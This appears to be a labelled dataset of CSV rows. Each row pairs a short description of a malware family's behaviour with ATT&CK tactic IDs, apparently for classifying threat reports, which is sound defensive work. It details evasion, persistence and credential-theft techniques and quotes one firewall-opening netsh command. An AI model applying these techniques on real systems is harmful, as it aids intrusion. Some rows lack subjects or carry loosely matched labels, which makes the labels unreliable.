GoldMax has decoded and decrypted the configuration file when executed.,['TA0005:Defense Evasion']
GoldMax has written AES-encrypted and Base64-encoded configuration files to disk.,['TA0005:Defense Evasion']
GoldMax can exfiltrate files over the existing C2 channel.,['TA0010:Exfiltration']
The GoldMax Linux variant has been executed with the `nohup` command to ignore hangup signals and continue to run if the terminal session was terminated.,['TA0005:Defense Evasion']
GoldMax can download and execute additional files.,['TA0011:Command and Control']
GoldMax has used decoy traffic to surround its malicious network traffic to avoid detection.,['TA0011:Command and Control']
GoldMax has impersonated systems management software to avoid detection.,['TA0005:Defense Evasion']
"GoldMax has used filenames that matched the system name, and appeared as a scheduled task impersonating systems management software within the corresponding ProgramData subfolder.",['TA0005:Defense Evasion']
GoldMax has used scheduled tasks to maintain persistence.,"['TA0002:Execution', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
GoldMax has been packed for obfuscation.,['TA0005:Defense Evasion']
GoldMax will check if it is being run in a virtualized environment by comparing the collected MAC address to c8:27:cc:c2:37:5a.,"['TA0005:Defense Evasion', 'TA0007:Discovery']"
GoldMax retrieved a list of the system's network interface after execution.,['TA0007:Discovery']
"GoldMax can check the current date-time value of the compromised system, comparing it to the hardcoded execution trigger and can send the current timestamp to the C2 server.",['TA0007:Discovery']
"GoldMax has set an execution trigger date and time, stored as an ASCII Unix/Epoch time value.","['TA0005:Defense Evasion', 'TA0007:Discovery']"
GoldMax has used HTTPS and HTTP GET requests with custom HTTP cookies for C2.,['TA0011:Command and Control']
"GoldMax can spawn a command shell, and execute native commands.",['TA0002:Execution']
GoldenSpy has been packaged with a legitimate tax preparation software.,['TA0001:Initial Access']
GoldenSpy's uninstaller has base64-encoded its variables.,['TA0005:Defense Evasion']
GoldenSpy has exfiltrated host environment information to an external C2 domain via port 9006.,['TA0010:Exfiltration']
"GoldenSpy's uninstaller can delete registry entries, files and folders, and finally itself once these tasks have been completed.",['TA0005:Defense Evasion']
"GoldenSpy has included a program ""ExeProtector"", which monitors for the existence of GoldenSpy on the infected system and redownloads if necessary.",['TA0007:Discovery']
"GoldenSpy constantly attempts to download and execute files from the remote C2, including GoldenSpy itself if not found on the system.",['TA0011:Command and Control']
GoldenSpy can create new users on an infected system.,['TA0003:Persistence']
GoldenSpy's setup file installs initial executables under the folder %WinDir%\System32\PluginManager.,['TA0005:Defense Evasion']
GoldenSpy can execute remote commands in the Windows command shell using the WinExec API.,['TA0002:Execution']
"GoldenSpy has used HTTP over ports 9005 and 9006 for network traffic, 9002 for C2 requests, 33666 as a WebSocket, and 8090 to download files.",['TA0011:Command and Control']
GoldenSpy has gathered operating system information.,['TA0007:Discovery']
GoldenSpy's installer has delayed installation of GoldenSpy for two hours after it reaches a victim system.,"['TA0005:Defense Evasion', 'TA0007:Discovery']"
GoldenSpy has used the Ryeol HTTP Client to facilitate HTTP internet communication.,['TA0011:Command and Control']
GoldenSpy can execute remote commands via the command-line interface.,['TA0002:Execution']
GoldenSpy has established persistence by running in the background as an autostart service.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
Goopy has had null characters padded in its malicious DLL payload.,['TA0005:Defense Evasion']
Goopy has the ability to delete emails used for C2 once the content has been copied.,['TA0005:Defense Evasion']
"Goopy has the ability to side-load malicious DLLs with legitimate applications from Kaspersky, Microsoft, and Google.","['TA0005:Defense Evasion', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
Goopy has the ability to communicate with its C2 over DNS.,['TA0011:Command and Control']
Goopy has the ability to exfiltrate documents from infected systems.,['TA0009:Collection']
Goopy has used a polymorphic decryptor to decrypt itself at runtime.,['TA0005:Defense Evasion']
Goopy has the ability to disable Microsoft Outlook's security policies to disable macro warnings.,['TA0005:Defense Evasion']
Goopy has the ability to exfiltrate data over the Microsoft Outlook C2 channel.,['TA0010:Exfiltration']
Goopy has the ability to use a Microsoft Outlook backdoor macro to communicate with its C2.,['TA0011:Command and Control']
"Goopy has impersonated the legitimate goopdate.dll, which was dropped on the target system with a legitimate GoogleUpdate.exe.",['TA0005:Defense Evasion']
Goopy has the ability to enumerate the infected system's user name via GetUserNameW.,['TA0002:Execution']
"Goopy's decrypter have been inflated with junk code in between legitimate API functions, and also included infinite loops to avoid analysis.",['TA0005:Defense Evasion']
Goopy has checked for the Google Updater process to ensure Goopy was loaded properly.,['TA0007:Discovery']
Goopy has the ability to maintain persistence by creating scheduled tasks set to run every hour.,"['TA0002:Execution', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
Goopy has the ability to enumerate the infected system's user name.,['TA0007:Discovery']
Goopy has the ability to use a Microsoft Outlook backdoor macro to communicate with its C2.,['TA0002:Execution']
Goopy has the ability to communicate with its C2 over HTTP.,['TA0011:Command and Control']
Goopy has the ability to use cmd.exe to execute commands passed from an Outlook C2 channel.,['TA0002:Execution']
Gootloader has the ability to decode and decrypt malicious payloads prior to execution.,['TA0005:Defense Evasion']
Gootloader can determine if a targeted system is part of an Active Directory domain by expanding the %USERDNSDOMAIN% environment variable.,['TA0007:Discovery']
Gootloader has used compromised legitimate domains to as a delivery network for malicious payloads.,['TA0042:Resource Development']
Gootloader can fetch second stage code from hardcoded web domains.,['TA0011:Command and Control']
Gootloader can execute a Javascript file for initial infection.,['TA0002:Execution']
Gootloader has been executed through malicious links presented to users as internet search results.,['TA0002:Execution']
The Gootloader first stage script is obfuscated using random alpha numeric strings.,['TA0005:Defense Evasion']
Gootloader can use its own PE loader to execute payloads in memory.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
Gootloader can use an encoded PowerShell stager to write to the Registry for persistence.,['TA0002:Execution']
Gootloader can inject its Delphi executable into ImagingDevices.exe using a process hollowing technique.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
Gootloader can create an autorun entry for a PowerShell script to run at reboot.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
Gootloader can retrieve a Base64 encoded stager from C2.,['TA0011:Command and Control']
Gootloader can inspect the User-Agent string in GET request header information to determine the operating system of targeted systems.,['TA0007:Discovery']
Gootloader can determine if a victim's computer is running an operating system with specific language preferences.,['TA0007:Discovery']
"Gootloader can use IP geolocation to determine if the person browsing to a compromised site is within a targeted territory such as the US, Canada, Germany, and South Korea.",['TA0007:Discovery']
Gootloader can use an embedded script to check the IP address of potential victims visiting compromised websites.,['TA0007:Discovery']
Gootloader can designate a sleep period of more than 22 seconds between stages of infection.,"['TA0005:Defense Evasion', 'TA0007:Discovery']"
Gootloader can insert malicious scripts to compromise vulnerable content management systems .,['TA0042:Resource Development']
Grandoreiro can identify installed security tools based on window names.,['TA0007:Discovery']
Grandoreiro can use SSL in C2 communication.,['TA0011:Command and Control']
Grandoreiro can utilize web services including Google sites to send and receive C2 data.,['TA0011:Command and Control']
Grandoreiro has added BMP images to the resources section of its Portable Executable file increasing each binary to at least 300MB in size.,['TA0005:Defense Evasion']
Grandoreiro can use malicious browser extensions to steal cookies and other user information.,['TA0003:Persistence']
Grandoreiro can monitor browser activity for online banking actions and display full-screen overlay images to block user access to the intended site or present additional data fields.,['TA0009:Collection']
Grandoreiro can bypass UAC by registering as the default handler for .MSC files.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
Grandoreiro can capture clipboard data from a compromised host.,['TA0009:Collection']
Grandoreiro can steal cookie data and credentials from Google Chrome.,['TA0006:Credential Access']
Grandoreiro can obtain C2 information from Google Docs.,['TA0011:Command and Control']
Grandoreiro can decrypt its encrypted internal strings.,['TA0005:Defense Evasion']
Grandoreiro can block the Deibold Warsaw GAS Tecnologia security tool at the firewall level.,['TA0005:Defense Evasion']
"Grandoreiro can hook APIs, kill processes, break file system paths, and change ACLs to prevent security tools from running.",['TA0005:Defense Evasion']
"Grandoreiro can use a DGA for hiding C2 addresses, including use of an algorithm with a user-specific key that changes daily.",['TA0011:Command and Control']
Grandoreiro has used compromised websites and Google Ads to bait victims into downloading its installer.,['TA0001:Initial Access']
Grandoreiro can parse Outlook .pst files to extract e-mail addresses.,['TA0007:Discovery']
The Grandoreiro payload has been delivered encrypted with a custom XOR-based algorithm and also as a base64-encoded ZIP file.,['TA0005:Defense Evasion']
Grandoreiro can send data it retrieves to the C2 server.,['TA0010:Exfiltration']
Grandoreiro can delete .LNK files created in the Startup folder.,['TA0005:Defense Evasion']
Grandoreiro can store its configuration in the Registry at `HKCU\Software\` under frequently changing names including %USERNAME% and ToolTech-RM.,['TA0005:Defense Evasion']
Grandoreiro can download its second stage from a hardcoded URL within the loader's code.,['TA0011:Command and Control']
Grandoreiro can log keystrokes on the victim's machine.,"['TA0009:Collection', 'TA0006:Credential Access']"
Grandoreiro has infected victims via malicious attachments.,['TA0002:Execution']
Grandoreiro has used malicious links to gain execution on victim machines.,['TA0002:Execution']
Grandoreiro has named malicious browser extensions and update files to appear legitimate.,['TA0005:Defense Evasion']
Grandoreiro can modify the Registry to store its configuration at `HKCU\Software\` under frequently changing names including %USERNAME% and ToolTech-RM.,['TA0005:Defense Evasion']
Grandoreiro can use MSI files to execute DLLs.,['TA0005:Defense Evasion']
Grandoreiro can execute through the WinExec API.,['TA0002:Execution']
Grandoreiro can identify installed security tools based on process names.,['TA0007:Discovery']
Grandoreiro can use run keys and create link files in the startup folder for persistence.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
Grandoreiro can list installed security products including the Trusteer and Diebold Warsaw GAS Tecnologia online banking protections.,['TA0007:Discovery']
Grandoreiro can write or modify browser shortcuts to enable launching of malicious browser extensions.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
Grandoreiro has been spread via malicious links embedded in e-mails.,['TA0001:Initial Access']
Grandoreiro can steal the victim's cookies to use for duplicating the active session from another device.,['TA0006:Credential Access']
Grandoreiro can detect VMWare via its I/O port and Virtual PC via the vpcext instruction.,"['TA0005:Defense Evasion', 'TA0007:Discovery']"
Grandoreiro can collect the computer name and OS version from a compromised host.,['TA0007:Discovery']
Grandoreiro can determine the IP and physical location of the compromised host via IPinfo.,['TA0007:Discovery']
Grandoreiro can collect the username from the victim's machine.,['TA0007:Discovery']
Grandoreiro can determine the time on the victim machine via IPinfo.,['TA0007:Discovery']
Grandoreiro can use VBScript to execute malicious code.,['TA0002:Execution']
Grandoreiro has the ability to use HTTP in C2 communications.,['TA0011:Command and Control']
Grandoreiro can modify the binary ACL to prevent security tools from running.,['TA0005:Defense Evasion']
"GravityRAT steals files with the following extensions: .docx, .doc, .pptx, .ppt, .xlsx, .xls, .rtf, and .pdf.",['TA0009:Collection']
GravityRAT steals files based on an extension list if a USB drive is connected to the system.,['TA0009:Collection']
GravityRAT has been delivered via Word documents using DDE for execution.,['TA0002:Execution']
GravityRAT supports file encryption .,['TA0005:Defense Evasion']
"GravityRAT collects the volumes mapped on the system, and also steals files with the following extensions: .docx, .doc, .pptx, .ppt, .xlsx, .xls, .rtf, and .pdf.",['TA0007:Discovery']
"The author of GravityRAT submitted samples to VirusTotal for testing, showing that the author modified the code to try to hide the DDE object in a different part of the document.",['TA0005:Defense Evasion']
"GravityRAT has used HTTP over a non-standard port, such as TCP port 46769.",['TA0011:Command and Control']
GravityRAT lists the running processes on the system.,['TA0007:Discovery']
GravityRAT creates a scheduled task to ensure it is re-executed everyday.,"['TA0002:Execution', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
"GravityRAT uses WMI to check the BIOS and manufacturer information for strings like ""VMWare"", ""Virtual"", and ""XEN"" and another WMI request to get the current temperature of the hardware to determine if it's a virtual machine environment.","['TA0005:Defense Evasion', 'TA0007:Discovery']"
"GravityRAT collects the MAC address, computer name, and CPU information.",['TA0007:Discovery']
"GravityRAT collects the victim IP address, MAC address, as well as the victim account domain name.",['TA0007:Discovery']
GravityRAT uses the netstat command to find open ports on the victim’s machine.,['TA0007:Discovery']
GravityRAT collects the victim username along with other account information .,['TA0007:Discovery']
GravityRAT has a feature to list the available services on the system.,['TA0007:Discovery']
GravityRAT can obtain the date and time of a system.,['TA0007:Discovery']
GravityRAT uses HTTP for C2.,['TA0011:Command and Control']
GravityRAT executes commands remotely on the infected host.,['TA0002:Execution']
"GravityRAT collects various information via WMI requests, including CPU information in the Win32_Processor entry .",['TA0002:Execution']
Green Lambert can use DNS for C2 communications.,['TA0011:Command and Control']
Green Lambert can collect data from a compromised host.,['TA0009:Collection']
Green Lambert can use multiple custom routines to decrypt strings prior to execution.,['TA0005:Defense Evasion']
Green Lambert can delete the original executable after initial installation in addition to unused functions.,['TA0005:Defense Evasion']
"Green Lambert can use Keychain Services API functions to find and collect passwords, such as `SecKeychainFindInternetPassword` and `SecKeychainItemCopyAttributesAndData`.",['TA0006:Credential Access']
"Green Lambert can create a Launch Agent with the `RunAtLoad` key-value pair set to true, ensuring the `com.apple.GrowlHelper.plist` file runs every time a user logs in.","['TA0003:Persistence', 'TA0004:Privilege Escalation']"
Green Lambert can add a plist file in the `Library/LaunchDaemons` to establish persistence.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
Green Lambert can add Login Items to establish persistence.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
Green Lambert has created a new executable named `Software Update Check` to appear legitimate.,['TA0005:Defense Evasion']
Green Lambert has been disguised as a Growl help file.,['TA0005:Defense Evasion']
Green Lambert has encrypted strings.,['TA0005:Defense Evasion']
Green Lambert can use proxies for C2 traffic.,['TA0011:Command and Control']
Green Lambert can add init.d and rc.d files in the /etc folder to establish persistence.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
"Green Lambert can use `uname` to identify the operating system name, version, and processor type.",['TA0007:Discovery']
Green Lambert can obtain proxy information from a victim's machine using system environment variables.,['TA0007:Discovery']
Green Lambert can collect the date and time from a compromised host.,['TA0007:Discovery']
"Green Lambert can use shell scripts for execution, such as /bin/sh -c.",['TA0002:Execution']
"Green Lambert can establish persistence on a compromised host through modifying the `profile`, `login`, and run command files associated with the `bash`, `csh`, and `tcsh` shells.","['TA0003:Persistence', 'TA0004:Privilege Escalation']"
GreyEnergy encrypts communications using RSA-2048.,['TA0011:Command and Control']
GreyEnergy digitally signs the malware with a code-signing certificate.,['TA0005:Defense Evasion']
GreyEnergy encrypts its configuration files with AES-256 and also encrypts its strings.,['TA0005:Defense Evasion']
GreyEnergy can securely delete a file by hooking into the DeleteFileA and DeleteFileW functions in the Windows API.,['TA0005:Defense Evasion']
GreyEnergy can download additional modules and payloads.,['TA0011:Command and Control']
GreyEnergy has a module to harvest pressed keystrokes.,"['TA0009:Collection', 'TA0006:Credential Access']"
GreyEnergy has a module for Mimikatz to collect Windows credentials from the victim’s machine.,['TA0006:Credential Access']
GreyEnergy modifies conditions in the Registry and adds keys.,['TA0005:Defense Evasion']
GreyEnergy has used Tor relays for Command and Control servers.,['TA0011:Command and Control']
GreyEnergy has a module to inject a PE binary into a remote process.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
GreyEnergy uses PsExec locally in order to execute rundll32.exe at the highest privileges .,['TA0005:Defense Evasion']
GreyEnergy is packed for obfuscation.,['TA0005:Defense Evasion']
GreyEnergy encrypts communications using AES256.,['TA0011:Command and Control']
GreyEnergy enumerates all Windows services.,['TA0007:Discovery']
GreyEnergy uses HTTP and HTTPS for C2 communications.,['TA0011:Command and Control']
GreyEnergy uses cmd.exe to execute itself in-memory.,['TA0002:Execution']
"GreyEnergy chooses a service, drops a DLL file, and writes it to that serviceDLL Registry key.","['TA0003:Persistence', 'TA0004:Privilege Escalation']"
GrimAgent can use a hardcoded server public RSA key to encrypt the first request to C2.,['TA0011:Command and Control']
GrimAgent has the ability to add bytes to change the file hash.,['TA0005:Defense Evasion']
GrimAgent can delete previously created tasks on a compromised host.,['TA0005:Defense Evasion']
GrimAgent can collect data and files from a compromised host.,['TA0009:Collection']
GrimAgent can use a decryption algorithm for strings based on Rotate on Right and Rotate on Left functionality.,['TA0005:Defense Evasion']
GrimAgent has sent data related to a compromise host over its C2 channel.,['TA0010:Exfiltration']
GrimAgent can delete old binaries on a compromised host.,['TA0005:Defense Evasion']
GrimAgent has the ability to enumerate files and directories on a compromised host.,['TA0007:Discovery']
GrimAgent has the ability to download and execute additional payloads.,['TA0011:Command and Control']
GrimAgent can pad C2 messages with random generated values.,['TA0011:Command and Control']
"GrimAgent uses the last 64 bytes of the binary to compute a mutex name. If the generated name is invalid, it will default to the generic `mymutex`.",['TA0005:Defense Evasion']
GrimAgent can use Native API including GetProcAddress and ShellExecuteW.,['TA0002:Execution']
GrimAgent has used Rotate on Right and Rotate on Left functionality to encrypt strings.,['TA0005:Defense Evasion']
GrimAgent can set persistence with a Registry run key.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
GrimAgent has the ability to set persistence using the Task Scheduler.,"['TA0002:Execution', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
GrimAgent can base64 encode C2 replies.,['TA0011:Command and Control']
GrimAgent can use an AES key to encrypt C2 communications.,['TA0011:Command and Control']
"GrimAgent can collect the OS, and build version on a compromised host.",['TA0007:Discovery']
"GrimAgent has used Accept-Language to identify hosts in the United Kingdom, United States, France, and Spain.",['TA0007:Discovery']
GrimAgent can identify the country code on a compromised host.,['TA0007:Discovery']
GrimAgent can enumerate the IP and domain of a target system.,['TA0007:Discovery']
GrimAgent can identify the user id on a target machine.,['TA0007:Discovery']
GrimAgent can sleep for 195 - 205 seconds after payload execution and before deleting its task.,"['TA0005:Defense Evasion', 'TA0007:Discovery']"
GrimAgent has the ability to use HTTP for C2 communications.,['TA0011:Command and Control']
"GrimAgent can use the Windows Command Shell to execute commands, including its own removal.",['TA0002:Execution']
GuLoader can delete its executable from the AppData\Local\Temp directory on the compromised host.,['TA0005:Defense Evasion']
GuLoader can download further malware for execution on the victim's machine.,['TA0011:Command and Control']
The GuLoader executable has been retrieved via embedded macros in malicious Word documents.,['TA0002:Execution']
GuLoader has relied upon users clicking on links to malicious documents.,['TA0002:Execution']
GuLoader can use a number of different APIs for discovery and execution.,['TA0002:Execution']
GuLoader has the ability to inject shellcode into a donor processes that is started in a suspended state. GuLoader has previously used RegAsm as a donor process.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
GuLoader can establish persistence via the Registry under HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
GuLoader has been spread in phishing campaigns using malicious web links.,['TA0001:Initial Access']
"GuLoader has the ability to perform anti-VM and anti-sandbox checks using string hashing, the API call EnumWindows, and checking for Qemu guest agent.","['TA0005:Defense Evasion', 'TA0007:Discovery']"
"GuLoader has the ability to perform anti-debugging based on time checks, API calls, and CPUID.","['TA0005:Defense Evasion', 'TA0007:Discovery']"
GuLoader can use HTTP to retrieve additional binaries.,['TA0011:Command and Control']
GuLoader has the ability to download malware from Google Drive.,['TA0011:Command and Control']
H1N1 bypasses user access control by using a DLL hijacking vulnerability in the Windows Update Standalone Installer .,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
"H1N1 dumps usernames and passwords from Firefox, Internet Explorer, and Outlook.",['TA0006:Credential Access']
H1N1 obfuscates C2 traffic with an altered version of base64.,['TA0011:Command and Control']
H1N1 kills and disables services for Windows Firewall.,['TA0005:Defense Evasion']
"H1N1 kills and disables services for Windows Security Center, and Windows Defender.",['TA0005:Defense Evasion']
H1N1 contains a command to download and execute a file from a remotely hosted URL using WinINet HTTP requests.,['TA0011:Command and Control']
H1N1 disable recovery options and deletes shadow copies from the victim.,['TA0040:Impact']
"H1N1 uses multiple techniques to obfuscate strings, including XOR.",['TA0005:Defense Evasion']
H1N1 has functionality to copy itself to removable media.,"['TA0001:Initial Access', 'TA0008:Lateral Movement']"
H1N1 uses a custom packing algorithm.,['TA0005:Defense Evasion']
H1N1 encrypts C2 traffic using an RC4 key.,['TA0011:Command and Control']
H1N1 has functionality to copy itself to network shares.,['TA0008:Lateral Movement']
H1N1 kills and disables services by using cmd.exe.,['TA0002:Execution']
HALFBAKED can delete a specified file.,['TA0005:Defense Evasion']
HALFBAKED can execute PowerShell scripts.,['TA0002:Execution']
HALFBAKED can obtain information about running processes on the victim.,['TA0007:Discovery']
HALFBAKED can obtain screenshots from the victim.,['TA0009:Collection']
"HALFBAKED can obtain information about the OS, processor, and BIOS.",['TA0007:Discovery']
HALFBAKED can use WMI queries to gather system information.,['TA0002:Execution']
HAMMERTOSS exfiltrates data by uploading it to accounts created by the actors on Web cloud storage providers for the adversaries to retrieve later.,['TA0010:Exfiltration']
HAMMERTOSS has used -WindowStyle hidden to conceal PowerShell windows.,['TA0005:Defense Evasion']
"The ""tDiscoverer"" variant of HAMMERTOSS establishes a C2 channel by downloading resources from Web services like Twitter and GitHub. HAMMERTOSS binaries contain an algorithm that generates a different Twitter handle for the malware to check for instructions every day.",['TA0011:Command and Control']
HAMMERTOSS is known to use PowerShell.,['TA0002:Execution']
HAMMERTOSS is controlled via commands that are appended to image files.,['TA0011:Command and Control']
"Before being appended to image files, HAMMERTOSS commands are encrypted with a key composed of both a hard-coded value and a string contained on that day's tweet. To decrypt the commands, an investigator would need access to the intended malware sample, the day's tweet, and the image file containing the command.",['TA0011:Command and Control']
"The ""Uploader"" variant of HAMMERTOSS visits a hard-coded server over HTTP/S to download the images HAMMERTOSS uses to receive commands.",['TA0011:Command and Control']
can download and execute a second-stage payload.,['TA0011:Command and Control']
"can collect system information, including computer name, system manufacturer, IsDebuggerPresent state, and execution path.",['TA0007:Discovery']
can collect the victim user name.,['TA0007:Discovery']
HARDRAIN opens the Windows Firewall to modify incoming connections.,['TA0005:Defense Evasion']
HARDRAIN binds and listens on port 443 with a FakeTLS method.,['TA0011:Command and Control']
HARDRAIN uses FakeTLS to communicate with its C2 server.,['TA0011:Command and Control']
"HARDRAIN uses the command cmd.exe /c netsh firewall add portopening TCP 443 ""adp"" and makes the victim machine function as a proxy server.",['TA0011:Command and Control']
HARDRAIN uses cmd.exe to execute netshcommands.,['TA0002:Execution']
HAWKBALL has encrypted data with XOR before sending it over the C2 channel.,['TA0009:Collection']
HAWKBALL has used an OLE object that uses Equation Editor to drop the embedded shellcode.,['TA0002:Execution']
HAWKBALL has encrypted the payload with an XOR-based algorithm.,['TA0005:Defense Evasion']
HAWKBALL has sent system information and files over the C2 channel.,['TA0010:Exfiltration']
HAWKBALL has exploited Microsoft Office vulnerabilities CVE-2017-11882 and CVE-2018-0802 to deliver the payload.,['TA0002:Execution']
HAWKBALL has the ability to delete files.,['TA0005:Defense Evasion']
"HAWKBALL has leveraged several Windows API calls to create processes, gather disk information, and detect debugger activity.",['TA0002:Execution']
"HAWKBALL can collect the OS version, architecture information, and computer name.",['TA0007:Discovery']
HAWKBALL can collect the user name of the system.,['TA0007:Discovery']
HAWKBALL has used HTTP to communicate with a single hard-coded C2 server.,['TA0011:Command and Control']
"HAWKBALL has created a cmd.exe reverse shell, executed commands, and uploaded output via the command line.",['TA0002:Execution']
HDoor kills anti-virus found on the victim.,['TA0005:Defense Evasion']
HDoor scans to identify open ports on the victim.,['TA0007:Discovery']
HELLOKITTY can use an embedded RSA-2048 public key to encrypt victim data for ransom.,['TA0040:Impact']
HELLOKITTY can delete volume shadow copies on compromised hosts.,['TA0040:Impact']
HELLOKITTY has the ability to enumerate network resources.,['TA0007:Discovery']
HELLOKITTY can search for specific processes to terminate.,['TA0007:Discovery']
HELLOKITTY can enumerate logical drives on a target system.,['TA0007:Discovery']
HELLOKITTY can use WMI to delete volume shadow copies.,['TA0002:Execution']
HIDEDRV injects a DLL for Downdelph into the explorer.exe process.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
HIDEDRV is a rootkit that hides certain operating system artifacts.,['TA0005:Defense Evasion']
Some strings in HOMEFRY are obfuscated with XOR x56.,['TA0005:Defense Evasion']
HOMEFRY can perform credential dumping.,['TA0006:Credential Access']
HOMEFRY uses a command-line interface.,['TA0002:Execution']
HOPLIGHT can enumerate device drivers located in the registry at `HKLM\Software\WBEM\WDM`.,['TA0007:Discovery']
HOPLIGHT has modified the firewall using netsh.,['TA0005:Defense Evasion']
HOPLIGHT has used its C2 channel to exfiltrate data.,['TA0010:Exfiltration']
HOPLIGHT has multiple C2 channels in place in case one fails.,['TA0011:Command and Control']
HOPLIGHT has been observed enumerating system drives and partitions.,['TA0007:Discovery']
HOPLIGHT has the ability to connect to a remote host in order to upload and download files.,['TA0011:Command and Control']
HOPLIGHT has modified Managed Object Format files within the Registry to run specific commands and create persistence on the system.,['TA0005:Defense Evasion']
HOPLIGHT has connected outbound over TCP port 443 with a FakeTLS method.,['TA0011:Command and Control']
HOPLIGHT has been observed loading several APIs associated with Pass the Hash.,"['TA0005:Defense Evasion', 'TA0008:Lateral Movement']"
HOPLIGHT has injected into running processes.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
HOPLIGHT has multiple proxy options that mask traffic between the malware and the remote operators.,['TA0011:Command and Control']
"A variant of HOPLIGHT hooks lsass.exe, and lsass.exe then checks the Registry for the data value 'rdpproto' under the key SYSTEM\CurrentControlSet\Control\Lsa Name.",['TA0007:Discovery']
HOPLIGHT has the capability to harvest credentials and passwords from the SAM database.,['TA0006:Credential Access']
HOPLIGHT has used svchost.exe to execute a malicious DLL .,['TA0002:Execution']
HOPLIGHT has utilized Zlib compression to obfuscate the communications payload.,['TA0011:Command and Control']
"HOPLIGHT has been observed collecting victim machine information like OS version, volume information, and more.",['TA0007:Discovery']
HOPLIGHT has been observed collecting system time from victim machines.,['TA0007:Discovery']
HOPLIGHT can launch cmd.exe to execute commands on the system.,['TA0002:Execution']
HOPLIGHT has used WMI to recompile the Managed Object Format files in the WMI repository.,['TA0002:Execution']
HOPLIGHT can use WMI event subscriptions to create persistence.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
HTRAN can inject into into running processes.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
HTRAN can proxy TCP socket connections to obfuscate command and control infrastructure.,['TA0011:Command and Control']
HTRAN can install a rootkit to hide network connections from the host OS.,['TA0005:Defense Evasion']
"HTTPBrowser abuses the Windows DLL load order by using a legitimate Symantec anti-virus binary, VPDN_LU.exe, to load a malicious DLL that mimics a legitimate Symantec DLL, navlu.dll.","['TA0005:Defense Evasion', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
HTTPBrowser has used DLL side-loading.,"['TA0005:Defense Evasion', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
HTTPBrowser has used DNS for command and control.,['TA0011:Command and Control']
HTTPBrowser deletes its original installer file once installation is complete.,['TA0005:Defense Evasion']
"HTTPBrowser is capable of listing files, folders, and drives on a victim.",['TA0007:Discovery']
HTTPBrowser is capable of writing a file to the compromised system from the C2 server.,['TA0011:Command and Control']
HTTPBrowser is capable of capturing keystrokes on victims.,"['TA0009:Collection', 'TA0006:Credential Access']"
HTTPBrowser's installer contains a malicious file named navlu.dll to decrypt and run the RAT. navlu.dll is also the name of a legitimate Symantec DLL.,['TA0005:Defense Evasion']
HTTPBrowser's code may be obfuscated through structured exception handling and return-oriented programming.,['TA0005:Defense Evasion']
HTTPBrowser has established persistence by setting the HKCU\Software\Microsoft\Windows\CurrentVersion\Run key value for wdm to the path of the executable. It has also used the Registry entry HKEY_USERS\Software\Microsoft\Windows\CurrentVersion\Run vpdn “%ALLUSERPROFILE%\%APPDATA%\vpdn\VPDN_LU.exe” to establish persistence.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
HTTPBrowser has used HTTP and HTTPS for command and control.,['TA0011:Command and Control']
HTTPBrowser is capable of spawning a reverse shell on a victim.,['TA0002:Execution']
HUI Loader can be deployed to targeted systems via legitimate programs that are vulnerable to DLL search order hijacking.,"['TA0005:Defense Evasion', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
HUI Loader can decrypt and load files containing malicious payloads.,['TA0005:Defense Evasion']
HUI Loader has the ability to disable Windows Event Tracing for Windows and Antimalware Scan Interface functions.,['TA0005:Defense Evasion']
Hacking Team UEFI Rootkit is a UEFI BIOS rootkit developed by the company Hacking Team to persist remote access software on some targeted systems.,['TA0005:Defense Evasion']
Hacking Team UEFI Rootkit is a UEFI BIOS rootkit developed by the company Hacking Team to persist remote access software on some targeted systems.,"['TA0005:Defense Evasion', 'TA0003:Persistence']"
Hancitor has decoded Base64 encoded URLs to insert a recipient’s name into the filename of the Word document. Hancitor has also extracted executables from ZIP files.,['TA0005:Defense Evasion']
Hancitor has deleted files using the VBA kill function.,['TA0005:Defense Evasion']
Hancitor has the ability to download additional files from C2.,['TA0011:Command and Control']
"Hancitor has used malicious Microsoft Word documents, sent via email, which prompted the victim to enable macros.",['TA0002:Execution']
Hancitor has relied upon users clicking on a malicious link delivered through phishing.,['TA0002:Execution']
Hancitor has used CallWindowProc and EnumResourceTypesA to interpret and execute shellcode.,['TA0002:Execution']
Hancitor has used Base64 to encode malicious links. Hancitor has also delivered compressed payloads in ZIP files to victims.,['TA0005:Defense Evasion']
Hancitor has used PowerShell to execute commands.,['TA0002:Execution']
Hancitor has added Registry Run keys to establish persistence.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
Hancitor has been delivered via phishing emails with malicious attachments.,['TA0001:Initial Access']
Hancitor has been delivered via phishing emails which contained malicious links.,['TA0001:Initial Access']
Hancitor has used verclsid.exe to download and execute a malicious script.,['TA0005:Defense Evasion']
"Hancitor has used a macro to check that an ActiveDocument shape object in the lure message is present. If this object is not found, the macro will exit without downloading additional payloads.","['TA0005:Defense Evasion', 'TA0007:Discovery']"
Havij is used to automate SQL injection.,['TA0001:Initial Access']
A Helminth VBScript receives a batch script to execute a set of commands in a command prompt.,['TA0009:Collection']
The executable version of Helminth has a module to log clipboard contents.,['TA0009:Collection']
"Helminth samples have been signed with legitimate, compromised code signing certificates owned by software company AI Squared.",['TA0005:Defense Evasion']
